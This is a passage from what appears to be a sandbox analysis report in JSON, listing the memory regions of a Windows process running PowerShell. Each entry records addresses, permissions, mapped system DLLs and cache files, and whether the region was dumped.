"c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791781867520, "timestamp": "00:00:19.915", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791783112704, "type": "region", "version": 1 }, "end_va": 8791783993343, "entry_point": 8791783125620, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_867", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791783112704, "timestamp": "00:00:19.916", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1339391, "entry_point": 0, "filename": null, "id": "region_868", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:00:19.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1384447, "entry_point": 0, "filename": null, "id": "region_869", "name": "pagefile_0x0000000000150000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1376256, "timestamp": "00:00:19.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1454079, "entry_point": 1441792, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui", "id": "region_870", "name": "powershell.exe.mui", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui", "region_type": "memory_mapped_file", "start_va": 1441792, "timestamp": "00:00:19.942", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000871-addr_0x0000000000170000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_44", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_871", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:00:19.948", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000872-addr_0x0000000000180000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_45", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1576959, "entry_point": 0, "filename": null, "id": "region_872", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:00:19.949", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 6193151, "entry_point": 0, "filename": null, "id": "region_873", "name": "pagefile_0x0000000000460000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4587520, "timestamp": "00:00:19.949", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6225920, "type": "region", "version": 1 }, "end_va": 7802879, "entry_point": 0, "filename": null, "id": "region_874", "name": "pagefile_0x00000000005f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6225920, "timestamp": "00:00:19.949", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 7864320, "type": "region", "version": 1 }, "end_va": 28835839, "entry_point": 0, "filename": null, "id": "region_875", "name": "pagefile_0x0000000000780000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7864320, "timestamp": "00:00:19.949", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000876-addr_0x0000000001c50000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_46", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 29687808, "type": "region", "version": 1 }, "end_va": 29753343, "entry_point": 0, "filename": null, "id": "region_876", "name": "private_0x0000000001c50000", "norm_filename": null, "region_type": "private_memory", "start_va": 29687808, "timestamp": "00:00:19.949", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000877-addr_0x0000000001c60000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_47", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 29753344, "type": "region", "version": 1 }, "end_va": 30801919, "entry_point": 0, "filename": null, "id": "region_877", "name": "private_0x0000000001c60000", "norm_filename": null, "region_type": "private_memory", "start_va": 29753344, "timestamp": "00:00:19.950", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000878-addr_0x0000000001ec0000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_48", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 32243712, "type": "region", "version": 1 }, "end_va": 32767999, "entry_point": 0, "filename": null, "id": "region_878", "name": "private_0x0000000001ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32243712, "timestamp": "00:00:19.950", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791746478080, "type": "region", "version": 1 }, "end_va": 8791746539519, "entry_point": 8791746482192, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_879", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791746478080, "timestamp": "00:00:19.950", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791767646208, "type": "region", "version": 1 }, "end_va": 8791767834623, "entry_point": 8791767650320, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_880", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791767646208, "timestamp": "00:00:19.950", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791777017856, "type": "region", "version": 1 }, "end_va": 8791778103295, "entry_point": 8791777022052, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_881", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791777017856, "timestamp": "00:00:19.951", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791723802624, "type": "region", "version": 1 }, "end_va": 8791724154879, "entry_point": 8791723850688, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_882", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791723802624, "timestamp": "00:00:19.953", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1642495, "entry_point": 0, "filename": null, "id": "region_883", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:00:19.958", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 30801920, "type": "region", "version": 1 }, "end_va": 31715327, "entry_point": 0, "filename": null, "id": "region_884", "name": "pagefile_0x0000000001d60000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30801920, "timestamp": "00:00:19.958", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000885-addr_0x0000000002070000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_49", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 34013184, "type": "region", "version": 1 }, "end_va": 34537471, "entry_point": 0, "filename": null, "id": "region_885", "name": "private_0x0000000002070000", "norm_filename": null, "region_type": "private_memory", "start_va": 34013184, "timestamp": "00:00:19.958", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791776362496, "type": "region", "version": 1 }, "end_va": 8791776989183, "entry_point": 8791776369680, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_886", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791776362496, "timestamp": "00:00:19.958", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1708031, "entry_point": 0, "filename": null, "id": "region_887", "name": "pagefile_0x00000000001a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1703936, "timestamp": "00:00:19.968", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791753424896, "type": "region", "version": 1 }, "end_va": 8791767613439, "entry_point": 8791753936572, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_888", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791753424896, "timestamp": "00:00:19.968", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 122880, "start_va": 8791734616064, "type": "region", "version": 1 }, "end_va": 8791734738943, "entry_point": 8791734621112, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_889", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 8791734616064, "timestamp": "00:00:19.975", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791747592192, "type": "region", "version": 1 }, "end_va": 8791747653631, "entry_point": 8791747598768, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_890", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791747592192, "timestamp": "00:00:19.976", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1777663, "entry_point": 0, "filename": null, "id": "region_891", "name": "pagefile_0x00000000001b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1769472, "timestamp": "00:00:19.988", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2048000, "start_va": 8791725768704, "type": "region", "version": 1 }, "end_va": 8791727816703, "entry_point": 8791727393060, "filename": "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "id": "region_892", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 8791725768704, "timestamp": "00:00:19.988", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1839103, "entry_point": 0, "filename": null, "id": "region_893", "name": "pagefile_0x00000000001c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1835008, "timestamp": "00:00:20.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1908735, "entry_point": 0, "filename": null, "id": "region_894", "name": "pagefile_0x00000000001d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1900544, "timestamp": "00:00:20.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 34537472, "type": "region", "version": 1 }, "end_va": 37482495, "entry_point": 34537472, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_895", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 34537472, "timestamp": "00:00:20.010", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000896-addr_0x0000000002450000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_50", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 38076416, "type": "region", "version": 1 }, "end_va": 38600703, "entry_point": 0, "filename": null, "id": "region_896", "name": "private_0x0000000002450000", "norm_filename": null, "region_type": "private_memory", "start_va": 38076416, "timestamp": "00:00:20.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1228800, "start_va": 8791724195840, "type": "region", "version": 1 }, "end_va": 8791725424639, "entry_point": 8791724233916, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_897", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 8791724195840, "timestamp": "00:00:20.011", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000898-addr_0x000007fffffdc000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_51", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092874752, "type": "region", "version": 1 }, "end_va": 8796092882943, "entry_point": 0, "filename": null, "id": "region_898", "name": "private_0x000007fffffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092874752, "timestamp": "00:00:20.012", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 8791715938304, "type": "region", "version": 1 }, "end_va": 8791716122623, "entry_point": 8791715942416, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_899", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 8791715938304, "timestamp": "00:00:20.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 8791784030208, "type": "region", "version": 1 }, "end_va": 8791784366079, "entry_point": 8791784034516, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_900", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 8791784030208, "timestamp": "00:00:20.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 151552, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2183167, "entry_point": 2031616, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000013.db", "id": "region_901", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db", "region_type": "memory_mapped_file", "start_va": 2031616, "timestamp": "00:00:20.029", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4329471, "entry_point": 0, "filename": null, "id": "region_902", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:00:20.029", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 221184, "start_va": 8791750737920, "type": "region", "version": 1 }, "end_va": 8791750959103, "entry_point": 8791750743156, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_903", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 8791750737920, "timestamp": "00:00:20.029", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 106496, "start_va": 8791751458816, "type": "region", "version": 1 }, "end_va": 8791751565311, "entry_point": 8791751464280, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_904", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 8791751458816, "timestamp": "00:00:20.030", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1929216, "start_va": 8791770988544, "type": "region", "version": 1 }, "end_va": 8791772917759, "entry_point": 8791770992656, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_905", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 8791770988544, "timestamp": "00:00:20.030", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000906-addr_0x0000000001e40000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_52", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 31719424, "type": "region", "version": 1 }, "end_va": 32243711, "entry_point": 0, "filename": null, "id": "region_906", "name": "private_0x0000000001e40000", "norm_filename": null, "region_type": "private_memory", "start_va": 31719424, "timestamp": "00:00:20.274", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 38600704, "type": "region", "version": 1 }, "end_va": 42741759, "entry_point": 0, "filename": null, "id": "region_907", "name": "pagefile_0x00000000024d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 38600704, "timestamp": "00:00:20.274", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 212992, "start_va": 8791604789248, "type": "region", "version": 1 }, "end_va": 8791605002239, "entry_point": 8791604789248, "filename": "\\Windows\\System32\\shdocvw.dll", "id": "region_908", "name": "shdocvw.dll", "norm_filename": "c:\\windows\\system32\\shdocvw.dll", "region_type": "memory_mapped_file", "start_va": 8791604789248, "timestamp": "00:00:20.274", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 8791649222656, "type": "region", "version": 1 }, "end_va": 8791649579007, "entry_point": 8791649227032, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_909", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 8791649222656, "timestamp": "00:00:20.284", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000910-addr_0x000007fffffda000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_53", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092866560, "type": "region", "version": 1 }, "end_va": 8796092874751, "entry_point": 0, "filename": null, "id": "region_910", "name": "private_0x000007fffffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092866560, "timestamp": "00:00:20.287", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1982463, "entry_point": 1966080, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_911", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 1966080, "timestamp": "00:00:20.715", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4407295, "entry_point": 4390912, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_912", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 4390912, "timestamp": "00:00:20.716", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 28835840, "type": "region", "version": 1 }, "end_va": 29032447, "entry_point": 28835840, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db", "id": "region_913", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db", "region_type": "memory_mapped_file", "start_va": 28835840, "timestamp": "00:00:20.716", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 29032448, "type": "region", "version": 1 }, "end_va": 29450239, "entry_point": 29032448, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_914", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 29032448, "timestamp": "00:00:20.716", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000915-addr_0x0000000001fc0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_54", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 33292288, "type": "region", "version": 1 }, "end_va": 33816575, "entry_point": 0, "filename": null, "id": "region_915", "name": "private_0x0000000001fc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33292288, "timestamp": "00:00:20.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791604723712, "type": "region", "version": 1 }, "end_va": 8791604772863, "entry_point": 8791604728704, "filename": "\\Windows\\System32\\linkinfo.dll", "id": "region_916", "name": "linkinfo.dll", "norm_filename": "c:\\windows\\system32\\linkinfo.dll", "region_type": "memory_mapped_file", "start_va": 8791604723712, "timestamp": "00:00:20.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 8791629103104, "type": "region", "version": 1 }, "end_va": 8791629627391, "entry_point": 8791629122188, "filename": "\\Windows\\System32\\ntshrui.dll", "id": "region_917", "name": "ntshrui.dll", "norm_filename": "c:\\windows\\system32\\ntshrui.dll", "region_type": "memory_mapped_file", "start_va": 8791629103104, "timestamp": "00:00:20.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791629627392, "type": "region", "version": 1 }, "end_va": 8791629688831, "entry_point": 8791629631552, "filename": "\\Windows\\System32\\cscapi.dll", "id": "region_918", "name": "cscapi.dll", "norm_filename": "c:\\windows\\system32\\cscapi.dll", "region_type": "memory_mapped_file", "start_va": 8791629627392, "timestamp": "00:00:20.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791710826496, "type": "region", "version": 1 }, "end_va": 8791710871551, "entry_point": 8791710846860, "filename": "\\Windows\\System32\\slc.dll", "id": "region_919", "name": "slc.dll", "norm_filename": "c:\\windows\\system32\\slc.dll", "region_type": "memory_mapped_file", "start_va": 8791710826496, "timestamp": "00:00:20.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 143360, "start_va": 8791745429504, "type": "region", "version": 1 }, "end_va": 8791745572863, "entry_point": 8791745434008, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_920", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 8791745429504, "timestamp": "00:00:20.719", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000921-addr_0x000007fffffd8000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_55", 